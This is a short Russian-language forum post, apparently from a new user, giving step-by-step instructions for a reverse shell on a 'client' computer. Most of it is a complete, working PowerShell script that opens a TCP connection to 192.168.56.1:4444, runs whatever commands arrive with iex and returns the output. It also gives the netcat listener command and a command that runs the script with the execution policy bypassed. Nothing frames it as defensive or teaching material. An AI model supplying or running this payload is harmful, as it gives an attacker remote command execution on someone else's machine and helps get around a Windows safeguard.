11.02.2026, 19:45
|
|
Новичок
Регистрация: 10.02.2026
Сообщений: 0
С нами:
136720
Репутация:
0
|
|
Для начала тебе нужно на компьютере клиента создать файл power.ps1
Вписать туда скрипт
$client = New-Object System.Net.Sockets.TCPClient('192.168.56.1',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
$sendback = (iex $data 2>&1 | Out-String)
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
} $client.Close()
После на своей машине прописать команду:
nc -lvnp 4444
При этом порт должен быть открыт
После этого на машине клиента прописываешь команду:
powershell -ExecutionPolicy Bypass -File power.ps1
|
|
|